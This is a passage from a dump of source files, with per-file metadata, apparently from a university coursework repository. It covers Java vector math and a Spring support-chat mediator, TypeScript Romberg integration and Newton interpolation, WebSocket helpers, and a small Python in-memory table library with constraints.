elements) {\r\n        this.elements = elements;\r\n    }\r\n\r\n    public static VectorVal fromMatrix(Matrix m) {\r\n        double[][] array = m.getArray();\r\n        VectorVal[] rows = new VectorVal[array.length];\r\n        for (int i = 0; i < array.length; i++) {\r\n            NumVal[] cols = new NumVal[array[i].length];\r\n            for (int j = 0; j < array[i].length; j++)\r\n                cols[j] = new NumVal(array[i][j]);\r\n            rows[i] = new VectorVal(cols);\r\n        }\r\n        return new VectorVal(rows);\r\n    }\r\n\r\n    @Override\r\n    public MathVal accept(MathValVisitor v) {\r\n        return v.visit(this);\r\n    }\r\n\r\n    private void assureSameLength(VectorVal other) {\r\n        if (elements.length != other.elements.length)\r\n            throw new IllegalArgumentException(\"Different number of elements in vector\");\r\n    }\r\n\r\n    public Matrix toMatrix() {\r\n        int m = elements.length;\r\n        int n = ((VectorVal) elements[0]).elements.length;\r\n        Matrix matrix = new Matrix(m, n);\r\n        for (int i = 0; i < m; i++) {\r\n            MathVal[] rows = ((VectorVal) elements[i]).elements;\r\n            for (int j = 0; j < n; j++) {\r\n                matrix.set(i, j, ((NumVal) rows[j]).val);\r\n            }\r\n        }\r\n        return matrix;\r\n    }\r\n\r\n    @Override\r\n    public MathVal mul(MathVal right) {\r\n        return right.accept(new MathValVisitor() {\r\n            @Override\r\n            public MathVal visit(NumVal num) {\r\n                return new VectorVal(stream(elements).map(el -> el.mul(num)).toArray(MathVal[]::new));\r\n            }\r\n\r\n            @Override\r\n            public MathVal visit(VectorVal vector) {\r\n                assureSameLength(vector);\r\n                MathVal sum = elements[0].mul(vector.elements[0]);\r\n                for (int i = 1; i < elements.length; i++) {\r\n                    sum = sum.plus(elements[i].mul(vector.elements[i]));\r\n                }\r\n                return sum;\r\n            }\r\n        });\r\n    }\r\n\r\n    @Override\r\n    public MathVal plus(MathVal right) {\r\n        return right.accept(new MathValVisitor() {\r\n            @Override\r\n            public MathVal visit(NumVal num) {\r\n                return new VectorVal(stream(elements).map(el -> el.plus(num)).toArray(MathVal[]::new));\r\n            }\r\n\r\n            @Override\r\n            public MathVal visit(VectorVal vector) {\r\n                assureSameLength(vector);\r\n                MathVal[] newVector = new MathVal[elements.length];\r\n                for (int i = 0; i < elements.length; i++)\r\n                    newVector[i] = elements[i].plus(vector.elements[i]);\r\n                return new VectorVal(newVector);\r\n            }\r\n        });\r\n    }\r\n\r\n    @Override\r\n    public MathVal vMul(MathVal right) {\r\n        return right.accept(new MathValVisitor() {\r\n            @Override\r\n            public MathVal visit(VectorVal vector) {\r\n                if (elements.length != 3 || vector.elements.length != 3)\r\n                    throw new IllegalArgumentException(\"Can't multiply vectors that are not 3-dimensional\");\r\n                MathVal[] a = elements;\r\n                MathVal[] b = vector.elements;\r\n\r\n                MathVal iPart = a[1].mul(b[2]).minus(a[2].mul(b[1]));\r\n                MathVal jPart = a[2].mul(b[0]).minus(a[0].mul(b[2]));\r\n                MathVal kPart = a[0].mul(b[1]).minus(a[1].mul(b[0]));\r\n\r\n                return new VectorVal(iPart, jPart, kPart);\r\n            }\r\n        });\r\n    }\r\n\r\n    @Override\r\n    public MathVal matMul(MathVal other) {\r\n        return other.accept(new MathValVisitor() {\r\n            @Override\r\n            public MathVal visit(VectorVal vector) {\r\n                return fromMatrix(toMatrix().times(vector.toMatrix()));\r\n            }\r\n        });\r\n    }\r\n\r\n    @Override\r\n    public MathVal inverse() {\r\n        return fromMatrix(toMatrix().inverse());\r\n    }\r\n\r\n    @Override\r\n    public MathVal transpose() {\r\n        return fromMatrix(toMatrix().transpose());\r\n    }\r\n\r\n    @Override\r\n    public String toString() {\r\n        return \"[\" + stream(elements).map(MathVal::toString).collect(Collectors.joining(\",\")) + \"]\";\r\n    }\r\n\r\n    @Override\r\n    public boolean equals(Object o) {\r\n        if (this == o) return true;\r\n        if (o 
== null || getClass() != o.getClass()) return false;\r\n\r\n VectorVal vectorVal = (VectorVal) o;\r\n\r\n return Arrays.deepEquals(vectorVal.elements, elements);\r\n }\r\n\r\n @Override\r\n public int hashCode() {\r\n return Arrays.deepHashCode(elements);\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6343033909797668, "alphanum_fraction": 0.6345511078834534, "avg_line_length": 38.39024353027344, "blob_id": "5963ec843d4246d986185521ab01a040bce10ded", "content_id": "5c874c4e8623b90d7d86d169f94723ec30f7f1a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 8075, "license_type": "no_license", "max_line_length": 106, "num_lines": 205, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/consult/impl/ConsultMediatorImpl.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.consult.impl;\n\nimport com.google.common.collect.ArrayListMultimap;\nimport com.google.common.collect.HashMultimap;\nimport com.google.common.collect.ListMultimap;\nimport com.google.common.collect.Multimap;\nimport io.github.k_gregory.insurance.service.consult.ConsultCollegaue;\nimport io.github.k_gregory.insurance.service.consult.ConsultMediator;\nimport io.github.k_gregory.insurance.service.consult.data.*;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\nimport org.springframework.stereotype.Service;\n\nimport java.io.IOException;\nimport java.util.*;\nimport java.util.stream.Collectors;\n\n@Service\npublic class ConsultMediatorImpl implements ConsultMediator {\n private final static Logger log = LoggerFactory.getLogger(ConsultMediatorImpl.class);\n\n private final Map<String, ConsultClient> clientIds = new HashMap<>();\n private final Set<ConsultClient> freeClients = new HashSet<>();\n private final Set<ConsultSupporter> supporters = new HashSet<>();\n private final ListMultimap<ConsultClient, SupportMessage> clientMessages = ArrayListMultimap.create();\n private final Map<ConsultClient, ConsultSupporter> clientConsulter = new HashMap<>();\n private final Multimap<ConsultSupporter, ConsultClient> consultClients = HashMultimap.create();\n\n\n @Override\n public synchronized void connectClient(ConsultClient client) {\n if (clientIds.put(client.getId(), client) != null) {\n log.warn(\"Added client that was in the list\");\n }\n\n if (!freeClients.add(client)) {\n log.warn(\"New client was in the set\");\n }\n\n NewClientNotification newClientNotification = new NewClientNotification(client.getId());\n for (ConsultSupporter s : supporters)\n try {\n s.sendNotification(newClientNotification);\n } catch (IOException e) {\n log.warn(\"Can't sendNotification supporter about connect\", e);\n }\n\n }\n\n @Override\n public synchronized void acceptClientQuestion(ConsultClient client, String messageText) {\n SupportMessage message = new SupportMessage(messageText, false);\n clientMessages.put(client, message);\n\n NewQuestionNotification notification = new NewQuestionNotification(client.getId(), message);\n for(ConsultSupporter supporter: supporters)\n try {\n supporter.sendNotification(notification);\n\n } catch (IOException e) {\n log.warn(\"Can't sendNotification supporter about new question\", e);\n }\n }\n\n @Override\n public synchronized void disconnectClient(ConsultClient client) {\n ConsultSupporter supporter = clientConsulter.get(client);\n\n for(ConsultSupporter s: supporters)\n try {\n s.sendNotification(new ClientDisconnectNotification(client.getId()));\n } catch 
(Throwable e) {\n log.warn(\"Can't sendNotification supporter about client disconnect\", e);\n }\n\n if (supporter != null) { //Supporter was assign, client not free\n if (supporter != clientConsulter.remove(client))\n log.warn(\"Supporter was not assigned\");\n if(!consultClients.remove(supporter, client))\n log.warn(\"Client was not assigned\");\n } else { //Client was free\n if (!freeClients.remove(client))\n log.warn(\"Client was not in free set\");\n }\n\n if (client != clientIds.remove(client.getId()))\n log.warn(\"Wrong ID mapping\");\n\n clientMessages.removeAll(client);\n\n }\n\n @Override\n public synchronized void connectSupporter(ConsultSupporter supporter) {\n if (!supporters.add(supporter))\n log.warn(\"Supporter already was in the set\");\n }\n\n @Override\n public synchronized Set<String> listFreeClients() {\n return freeClients\n .stream()\n .map(ConsultCollegaue::getId)\n .collect(Collectors.toSet());\n }\n\n @Override\n public synchronized void acceptClient(ConsultSupporter supporter, String clientId) {\n ConsultClient client = clientIds.get(clientId);\n if (client == null) {\n log.warn(\"Supporter tried to accept non-existent client\");\n } else if (!freeClients.contains(client)) {\n log.warn(\"Supporter tried to accept non-free client\");\n } else {\n for(ConsultSupporter s : supporters)\n try {\n s.sendNotification(new ClientAssignedNotification(clientId, s==supporter));\n } catch (IOException e) {\n log.warn(\"Can't notify supporter about assign\", e);\n }\n if (clientConsulter.put(client, supporter) != null)\n log.warn(\"Client already had supporter\");\n if (!consultClients.put(supporter, client))\n log.warn(\"Client was already accepted\");\n if (!freeClients.remove(client))\n log.warn(\"Client wasn't in free clientIds set\");\n }\n\n }\n\n @Override\n public synchronized void unacceptClient(ConsultSupporter supporter, String clientId) {\n ConsultClient client = clientIds.get(clientId);\n if (client == null)\n log.warn(\"Supporter tried to un-accept non-existent client\");\n else {\n NewClientNotification newClientNotification = new NewClientNotification(clientId);\n for(ConsultSupporter s : supporters)\n try {\n s.sendNotification(newClientNotification);\n } catch (IOException e) {\n log.warn(\"Can't notify supporter about new client\", e);\n }\n if (supporter != clientConsulter.remove(client))\n log.warn(\"Client wasn't assign to supporter\");\n if (!consultClients.remove(supporter, client))\n log.warn(\"Supporter wasn't assigned to client\");\n if (!freeClients.add(client))\n log.warn(\"Client was in free clientIds set\");\n }\n\n }\n\n @Override\n public synchronized List<SupportMessage> listClientMessages(String clientId) {\n ConsultClient client = clientIds.get(clientId);\n\n if (client == null) {\n log.warn(\"Client not found\");\n return Collections.emptyList();\n }\n\n List<SupportMessage> messages = this.clientMessages.get(client);\n return Collections.unmodifiableList(messages);\n\n }\n\n @Override\n public synchronized void acceptSupporterAnswer(ConsultSupporter supporter, String to, String msg) {\n SupportMessage message = new SupportMessage(msg, true);\n ConsultClient client = clientIds.get(to);\n if (client == null) {\n log.warn(\"Supporter sent message to non-existent client\");\n } else {\n NewAnswerNotification notification = new NewAnswerNotification(message);\n clientMessages.put(client, message);\n try {\n client.sendNotification(notification);\n } catch (IOException e) {\n log.warn(\"Can't sendNotification client about new message\", e);\n 
}\n }\n\n }\n\n @Override\n public synchronized void disconnectSupporter(ConsultSupporter supporter) {\n Collection<ConsultClient> clients = consultClients.removeAll(supporter);\n freeClients.addAll(clients);\n for (ConsultClient client : clients) {\n NewClientNotification newClientNotification = new NewClientNotification(client.getId());\n if (supporter != clientConsulter.remove(client))\n log.warn(\"Client wasn't assigned to supporter\");\n for(ConsultSupporter s : supporters)\n try {\n s.sendNotification(newClientNotification);\n } catch (IOException e) {\n log.warn(\"Can't notify about new client\", e);\n }\n }\n if (!supporters.remove(supporter))\n log.warn(\"Supporter wasn't connected\");\n\n }\n}\n" }, { "alpha_fraction": 0.5866013169288635, "alphanum_fraction": 0.5996732115745544, "avg_line_length": 17.74193572998047, "blob_id": "2b41a9981b43d07c48053d930ae68410b72d0c11", "content_id": "c2700d133904d2ff703e8c847753253aee443a17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 612, "license_type": "no_license", "max_line_length": 59, "num_lines": 31, "path": "/oldtest/rss-reader/src/main/java/io/github/k_gregory/otp/rss_reader/entity/OldDocument.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.rss_reader.entity;\r\n\r\nimport javax.persistence.*;\r\n\r\n/**\r\n * Created by grego on 13.05.2017.\r\n */\r\n\r\n@Entity\r\npublic class OldDocument {\r\n private Integer id;\r\n private String content;\r\n\r\n @Id @GeneratedValue(strategy = GenerationType.IDENTITY)\r\n public Integer getId() {\r\n return id;\r\n }\r\n\r\n public void setId(Integer id) {\r\n this.id = id;\r\n }\r\n\r\n @Column(columnDefinition = \"text\")\r\n public String getContent() {\r\n return content;\r\n }\r\n\r\n public void setContent(String content) {\r\n this.content = content;\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5346869826316833, "alphanum_fraction": 0.5532994866371155, "avg_line_length": 22.625, "blob_id": "fa010fe444198d152e44d40cca25e0dca42bc66a", "content_id": "45b6a74beb1d031754bc1e66361e4229c40eb9f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 591, "license_type": "no_license", "max_line_length": 80, "num_lines": 24, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab3/task1/MaleGiftVisitor.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab3.task1;\r\n\r\n/**\r\n * Created by grego on 08.04.2017.\r\n */\r\npublic class MaleGiftVisitor extends BaseGiftVisitor {\r\n public MaleGiftVisitor(String name, int calmLevel) {\r\n super(name, calmLevel);\r\n }\r\n\r\n @Override\r\n public void visit(CarModel c) {\r\n if (!isCalm()) {\r\n System.out.println(name + \" doesn't like \" + c + \", he crushes it\");\r\n c.crush();\r\n }\r\n c.move();\r\n }\r\n\r\n @Override\r\n public void visit(Doll d) {\r\n say(d + \" is still better than a sweetroll\");\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5993788838386536, "alphanum_fraction": 0.5993788838386536, "avg_line_length": 34.77777862548828, "blob_id": "20b1a3d50b7c7f5ad2f6442f26d2b13fbf336348", "content_id": "b319be946c0d04343c645ad3736c439eaa5b5230", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 322, "license_type": "no_license", "max_line_length": 84, "num_lines": 9, "path": "/insurance/frontend/src/util/urls.ts", "repo_name": "k-gregory/KPI", "src_encoding": 
"UTF-8", "text": "export function webSocketUrlRelative(s: string):string {\n let l = window.location;\n return ((l.protocol === \"https:\") ? \"wss://\" : \"ws://\") + l.host + l.pathname + s;\n}\n\nexport function webSocketUrl(s: string):string {\n let l = window.location;\n return ((l.protocol === \"https:\") ? \"wss://\" : \"ws://\") + l.host + s;\n}\n" }, { "alpha_fraction": 0.5208955407142639, "alphanum_fraction": 0.5343283414840698, "avg_line_length": 19, "blob_id": "e9a0e04766c2de36c3b39a1af8dbe700d1f105ae", "content_id": "5d98083d599288631e5fa381785e60ee4c2753b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1340, "license_type": "no_license", "max_line_length": 101, "num_lines": 67, "path": "/numerical-methods/src/app/romberg.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {trapetion_simple} from \"./trapetion\";\n\nexport function trapetion_one(f: (number)=> number, low: number, high: number): number {\n return (f(low) + f(high)) / 2 * (high - low);\n}\n\nexport interface RombergResult {\n table: number[][];\n result: number,\n accuracy: number\n}\n\nexport function romberg(f: (number)=>number, low : number, high: number, e : number): RombergResult {\n if(low > high) throw new Error(\"Low bigger than high\");\n if(e <= 0)throw new Error(\"Too small e\");\n\n if(low == high) return {\n table: [],\n result: 0,\n accuracy: 0\n };\n\n\n let h = high - low;\n let i = 1;\n let accuracy = NaN;\n\n const I : number[][] = [];\n I.push([trapetion_one(f, low, high)]);\n\n\n while (true){\n let breaked = false;\n h = h / 2;\n\n I.push([trapetion_simple(f, low, high, h)]);\n\n for(let k = 1; k <= i; k++){\n let r = (I[i][k-1] - I[i-1][k-1]) / (Math.pow(2, 2 * k) - 1);\n const new_value = I[i][k-1] + r;\n I[i].push(new_value);\n\n if(Math.abs(r) < e) {\n accuracy = Math.abs(r);\n breaked = true;\n break;\n }\n }\n i++;\n\n if(breaked){\n break;\n }\n\n if(i > 30) {\n throw new Error(`Can't get accuracy in ${i} iterations`);\n }\n }\n\n const lastA = I[I.length - 1];\n\n return {\n result:lastA[lastA.length - 1],\n table: I,\n accuracy\n };\n}\n" }, { "alpha_fraction": 0.5358842015266418, "alphanum_fraction": 0.5367114543914795, "avg_line_length": 30.8092098236084, "blob_id": "59e8dc5b4f13ff167bc0933e16ef219c406502db", "content_id": "060417404708813a29f7a3c031b5015cf1a019ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4835, "license_type": "no_license", "max_line_length": 99, "num_lines": 152, "path": "/db/lab1/data.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "class Seq:\n def __init__(self):\n self.s = 0\n\n def __call__(self):\n self.s += 1\n return self.s\n\ndef autoinc():\n return Seq()\n\nclass AttributeReference:\n def __init__(self, table, attribute, referer, ref_attr):\n self.table = table\n self.attribute = attribute\n self.referer = referer\n self.ref_attr = ref_attr\n\n\nclass Attribute:\n def __init__(self, name, can_none=True, reference=None, default=None, unique=False):\n self.name = name\n self.reference = reference\n self.default = default\n self.references = []\n self.can_none = can_none\n self.unique = unique\n\n def __str__(self):\n if self.reference is not None:\n return \"'{}, refers {}\".format(self.name, self.reference)\n else:\n return \"'{}\".format(self.name)\n\n\nclass Table:\n @staticmethod\n def check_attributes(attributes):\n if len(attributes) < 1:\n raise ValueError(\"Table must have at 
least one attribute\")\n\n attr_names = set()\n for attr in attributes:\n if attr.name in attr_names:\n raise ValueError(\"Duplicate attribute name\")\n else:\n attr_names.add(attr.name)\n\n def __init__(self, *attributes):\n Table.check_attributes(attributes)\n self.data = []\n\n for attr in attributes:\n ref_mk = attr.reference\n if ref_mk is not None:\n attr.reference = ref_mk(self, attr.name)\n self.attributes = dict([(attr.name, attr) for attr in attributes])\n self.uniques = dict([(attr.name, set()) for attr in attributes if attr.unique])\n\n def reference(self, attribute_name):\n if attribute_name not in self.attributes:\n raise ValueError(\"Can't get reference to non-existent attribute\")\n if attribute_name not in self.uniques:\n raise ValueError(\"Can't get reference to non-unique attribute\")\n\n attr = self.attributes[attribute_name]\n\n def create_reference(referer, ref_attr):\n r = AttributeReference(self, attr, referer, ref_attr)\n attr.references.append(r)\n return r\n\n return create_reference\n\n def check_modify(self, mrow, attribute):\n for ref in attribute.references:\n for row in ref.referer.data:\n if ref.ref_attr in row and attribute.name in mrow:\n if row[ref.ref_attr] == mrow[attribute.name]:\n raise ValueError(\"Can't modify {}, dependent row exists\".format(attribute))\n\n def find(self, **conds):\n for k in conds:\n if not k in self.attributes:\n raise ValueError(\"Can't find by non-existent attribute\")\n\n rs = []\n for row in self.data:\n matches = True\n for k,v in conds.items():\n if row[k] != v:\n matches = False\n break\n if matches:\n rs.append(row)\n\n return rs\n\n\n def __update_row(self, row, updates):\n for attr in self.attributes.values():\n if not attr.name in updates:\n continue\n else:\n v = updates[attr.name]\n\n if v is None and not attr.can_none:\n raise ValueError(\"Can't put None to {}\".format(attr.name))\n\n ref = attr.reference\n if ref is not None:\n if len(ref.table.find(**{ref.attribute.name:v})) != 1:\n raise ValueError(\"Can't reference {}\".format(ref.attribute.name))\n\n if attr.unique:\n if v in self.uniques[attr.name]:\n if attr.name in row and row[attr.name] == v:\n pass\n else:\n raise ValueError(\"Unique constraint fail: {}\".format(attr.name))\n else:\n if attr.name in row:\n self.uniques[attr.name].remove(row[attr.name])\n self.uniques[attr.name].add(v)\n\n self.check_modify(row, attr)\n row[attr.name] = v\n\n def delete(self, rows):\n for row in rows:\n for attr in self.attributes.values():\n self.check_modify(row, attr)\n if attr.unique:\n self.uniques[attr.name].remove(row[attr.name])\n\n #WHYYY???\n self.data = list(filter(lambda r: r not in rows, self.data))\n\n def update(self, rows, **changes):\n for row in rows:\n self.__update_row(row, changes)\n\n def add(self, **values):\n row = {}\n\n for attr in self.attributes.values():\n if attr.name not in values:\n values[attr.name] = attr.default()\n\n\n self.__update_row(row, values)\n self.data.append(row)\n" }, { "alpha_fraction": 0.5775039196014404, "alphanum_fraction": 0.5870508551597595, "avg_line_length": 25.54838752746582, "blob_id": "48a57a182005aa52fe9bdf11f8d61b5e5ffb8fbe", "content_id": "35dd7585f90e5ba17f5471beed34247fe3b93f93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 5761, "license_type": "no_license", "max_line_length": 95, "num_lines": 217, "path": "/numerical-methods/src/app/newton.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "export class FirstNewton {\n _values: 
{ x: number, y: number }[];\n\n constructor(_values: { x: number, y: number }[]) {\n this._values = [..._values];\n this._values.sort((a,b)=>(b.x - a.x))\n }\n\n _cache: { [key: string]: number } = {};\n\n private CalculateBase(point: number): number {\n let baseValue = Number.MAX_VALUE;\n let baseIndex = -1;\n for (let i = 0; i < this._values.length; i++) {\n const value = this._values[i].x;\n if (Math.abs(point - value) < Math.abs(point - baseValue)) {\n baseValue = value;\n baseIndex = i;\n }\n }\n\n return baseIndex;\n }\n\n\n private PopulateCache(baseIndex: number): number {\n const d = 100;\n const epsilon = 5 * Math.pow(10, -d);\n\n for (let length = 1; length + baseIndex < this._values.length; length++) {\n let isLargerThanEpsilon = false;\n\n for (let from = baseIndex; from + length < this._values.length; from++) {\n let delta = this.CalculateDelta(from, length);\n this._cache[FirstNewton.GetCacheKey(from, length)] = delta;\n if (Math.abs(delta) > epsilon)\n isLargerThanEpsilon = true;\n }\n\n if (!isLargerThanEpsilon)\n return length;\n }\n\n return this._values.length - baseIndex;\n }\n\n private CalculateDelta(from: number, length: number): number {\n if (length == 1)\n return this._values[from].y;\n\n return (this.CachedDelta(from + 1, length - 1) - this.CachedDelta(from, length - 1))\n / (this._values[from + length - 1].x - this._values[from].x);\n }\n\n private static GetCacheKey(from: number, length: number): string {\n return `${from}: ${length}`;\n }\n\n private CachedDelta(from: number, length: number): number {\n return this._cache[FirstNewton.GetCacheKey(from, length)];\n }\n\n private static Factorial(i: number): number {\n let result = 1;\n for (; i != 1; i--)\n result = result * i;\n return result;\n }\n\n public Interpolate(point: number) : number {\n const baseIndex = this.CalculateBase(point);\n const stoppedAt = this.PopulateCache(baseIndex);\n\n let acc = this._values[baseIndex].y;\n for(let length = 2; length < stoppedAt; length++){\n let xAcc = 1;\n for(let cur = 0; cur < length; cur++){\n xAcc *= (point - this._values[cur + baseIndex].x)\n }\n acc += this.CachedDelta(baseIndex, length) * xAcc / FirstNewton.Factorial(length);\n }\n\n return acc;\n }\n}\n\nexport class SecondNewtonEvenly {\n _values: { x: number, y: number }[];\n\n constructor(_values: { x: number, y: number }[]) {\n this._values = [..._values];\n this._values.sort((a,b)=>(b.x - a.x))\n }\n\n _cache: { [key: string]: number } = {};\n\n private CalculateBase(point: number): number {\n let baseValue = Number.MAX_VALUE;\n let baseIndex = -1;\n for (let i = 0; i < this._values.length; i++) {\n const value = this._values[i].x;\n if (Math.abs(point - value) < Math.abs(point - baseValue)) {\n baseValue = value;\n baseIndex = i;\n }\n }\n\n return baseIndex;\n }\n\n\n private PopulateCache(baseIndex: number): number {\n const d = 100;\n const epsilon = 5 * Math.pow(10, -d);\n\n for (let length = 1; length + baseIndex < this._values.length; length++) {\n let isLargerThanEpsilon = false;\n\n for (let from = baseIndex; from + length < this._values.length; from++) {\n let delta = this.CalculateDelta(from, length);\n this._cache[SecondNewtonEvenly.GetCacheKey(from, length)] = delta;\n if (Math.abs(delta) > epsilon)\n isLargerThanEpsilon = true;\n }\n\n if (!isLargerThanEpsilon)\n return length;\n }\n\n return this._values.length - baseIndex;\n }\n\n private CalculateDelta(from: number, length: number): number {\n if (length == 1)\n return this._values[from].y;\n\n return (this.CachedDelta(from + 1, length 
- 1) - this.CachedDelta(from, length - 1));\n }\n\n private static GetCacheKey(from: number, length: number): string {\n return `${from}: ${length}`;\n }\n\n private CachedDelta(from: number, length: number): number {\n return this._cache[SecondNewtonEvenly.GetCacheKey(from, length)];\n }\n\n private static Factorial(i: number): number {\n let result = 1;\n for (; i != 1; i--)\n result = result * i;\n return result;\n }\n\n public Interpolate(point: number) : number {\n const baseIndex = this.CalculateBase(point);\n const stoppedAt = this.PopulateCache(baseIndex);\n\n let acc = this._values[baseIndex].y;\n for(let length = 2; length < stoppedAt; length++){\n let xAcc = 1;\n for(let cur = 0; cur < length; cur++){\n xAcc *= (point - this._values[cur + baseIndex].x)\n }\n acc += this.CachedDelta(baseIndex, length) * xAcc / SecondNewtonEvenly.Factorial(length);\n }\n\n return acc;\n }\n}\n\nfunction fact(i: number): number {\n let result = 1;\n for (; i != 1; i--)\n result = result * i;\n return result;\n}\n\nexport function newton_second_evenly(f: { x: number, y: number }[], x: number) {\n f = [...f];\n f.sort((a,b)=>(b.x - a.x));\n\n const n = f.length;\n const columns = [f.map(e=>e.y)];\n let brkN = n;\n\n for(let column = 1; column < n; column++){\n const col = [];\n columns.push(col);\n for(let row = 0; row < n - column; row++){\n col.push(columns[column - 1][row + 1] - columns[column - 1][row]);\n }\n if(Math.abs(Math.min.apply(null, col)) < 1e-9){\n brkN = column;\n break;\n }\n }\n\n let h = (f[1].x - f[0].x);\n let q = (x - f[0].x) / h;\n let qmult = 1;\n let nMult = 1;\n let sum = f[0].y;\n\n for(let i = 1; i < brkN; i++){\n qmult *= (q - i + 1);\n nMult *= (i);\n\n sum += qmult / nMult * columns[i][0];\n }\n\n return sum;\n}\n\nexport function newton_first(f: {x: number, y: number}[], x: number){\n return new FirstNewton(f).Interpolate(x);\n}\n" }, { "alpha_fraction": 0.7134670615196228, "alphanum_fraction": 0.7134670615196228, "avg_line_length": 28.08333396911621, "blob_id": "0d48eedb297747869ea5ade614e13fb6ea00d7fa", "content_id": "cf3803fe1bfd08d8c8a841a169920fa89528aa68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 349, "license_type": "no_license", "max_line_length": 61, "num_lines": 12, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/consult/data/SupportMessage.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.consult.data;\n\npublic class SupportMessage extends ConsultNotification{\n public final String text;\n public final boolean fromSupport;\n\n public SupportMessage(String text, boolean fromSupport) {\n super(\"message\");\n this.text = text;\n this.fromSupport = fromSupport;\n }\n}\n" }, { "alpha_fraction": 0.7373965382575989, "alphanum_fraction": 0.7373965382575989, "avg_line_length": 35.91666793823242, "blob_id": "7e777d59a060d114a8d2748f0f7808459f7ba965", "content_id": "5c05a072da4c867cdd92405731601fbb7e193d04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1329, "license_type": "no_license", "max_line_length": 130, "num_lines": 36, "path": "/insurance/frontend/src/consultation/MessageFactory.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {\n ClientAssignedNotification,\n ClientDisconnectNotification, FreeClientListNotification, MessageListNotification, NewAnswerNotification, NewClientNotification,\n 
NewQuestionNotification,\n SupportMessage,\n WsNotification\n} from './ConsultationMessage';\nexport interface MessageFactory{\n create(msg: string): WsNotification\n}\n\nexport class JsonMessageFactory implements MessageFactory{\n create(msg: string): WsNotification {\n function getMessage(data: any): SupportMessage {\n return new SupportMessage(data.text, data.fromSupport);\n }\n const data = JSON.parse(msg);\n switch(data.tag){\n case \"new-question\":\n return new NewQuestionNotification(getMessage(data.message), data.clientId);\n case \"new-client\":\n return new NewClientNotification(data.clientId);\n case \"new-answer\":\n return new NewAnswerNotification(getMessage(data.message));\n case \"client-disconnected\":\n return new ClientDisconnectNotification(data.clientId);\n case \"client-assigned\":\n return new ClientAssignedNotification(data.clientId, data.toRecv);\n case \"client-list\":\n return new FreeClientListNotification(data.clients);\n case \"list-client-messages\":\n return new MessageListNotification(data.clientId, data.messages.map(getMessage));\n }\n }\n\n}\n" }, { "alpha_fraction": 0.565527081489563, "alphanum_fraction": 0.5811966061592102, "avg_line_length": 19.9375, "blob_id": "96ce1c3bd7c3f9491bb7a05a0e7398805fbe3f78", "content_id": "38b084e4cf992c79215a85e609149d4dd29ee791", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 702, "license_type": "no_license", "max_line_length": 59, "num_lines": 32, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab3/task1/Doll.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab3.task1;\r\n\r\n/**\r\n * Created by grego on 07.04.2017.\r\n */\r\npublic class Doll implements Gift {\r\n private String name = \"unnamed\";\r\n private String dressName = \"no dress\";\r\n\r\n public void setDress(String dress) {\r\n this.dressName = dress;\r\n }\r\n\r\n public void setName(String name) {\r\n this.name = name;\r\n }\r\n\r\n @Override\r\n public String toString() {\r\n return \"doll \" + name + \" in \" + dressName;\r\n }\r\n\r\n @Override\r\n public Gift clone() throws CloneNotSupportedException {\r\n return (Doll) super.clone();\r\n }\r\n\r\n @Override\r\n public void accept(GiftVisitor v) {\r\n v.visit(this);\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.7445095181465149, "alphanum_fraction": 0.7445095181465149, "avg_line_length": 36.94444274902344, "blob_id": "31c83ac94afb1016d23eb015c17144fd991daf62", "content_id": "063cceef684b57659491ceb6f680fec488c1e333", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1366, "license_type": "no_license", "max_line_length": 110, "num_lines": 36, "path": "/insurance/frontend/src/app/client-consultation.service.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { Injectable } from '@angular/core';\nimport {webSocketUrl} from 'util/urls'\nimport {Observable, Subject} from '@reactivex/rxjs';\nimport {BufferSendableState, ConnectionContext, WebSocketSendableState} from '../websocket/ConnectionContext';\nimport {NewAnswerNotification, SupportMessage} from '../consultation/ConsultationMessage';\nimport {JsonMessageFactory} from '../consultation/MessageFactory';\n\n@Injectable()\nexport class ClientConsultationService {\n private wsUrl = webSocketUrl('/ws/consult/client');\n private ws: WebSocket;\n private wsCtx = new ConnectionContext();\n wsObservable: Observable<SupportMessage>;\n messages: 
